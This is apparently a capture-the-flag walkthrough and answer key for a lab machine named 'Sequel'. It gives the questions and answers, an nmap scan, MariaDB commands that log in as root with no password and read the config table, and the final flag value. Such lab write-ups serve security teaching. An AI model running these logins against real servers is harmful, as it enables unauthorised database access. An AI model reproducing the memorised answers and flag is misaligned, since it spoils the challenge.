Task 1

Q : What does the acronym SQL stand for?
A : Structured Query Language

Task 2

Q : During our scan, which port running mysql do we find?

[host] # nmap -sVC --open -oA Sequel_init_scan <target_ip>

A : 3306

Task 3

Q : What community-developed MySQL version is the target running?
A : MariaDB

Task 4

Q : What switch do we need to use in order to specify a login username for the MySQL service?
A : -u

Task 5

Q : Which username allows us to log into MariaDB without providing a password?
A : root

Task 6

Q : What symbol can we use to specify within the query that we want to display everything inside a table?
A : *

Task 7

Q : What symbol do we need to end each query with?
A : ;


Q : Submit root flag

[host] # mariadb -u root -P 3306 -h <target_ip>
MariaDB [(none)]> SHOW DATABASES;
MariaDB [(none)]> USE htb;
MariaDB [htb]> SHOW TABLES;
MariaDB [htb]> SELECT * FROM config;

A : 7b4bec00d1a39e3dd4e021ec3d915da8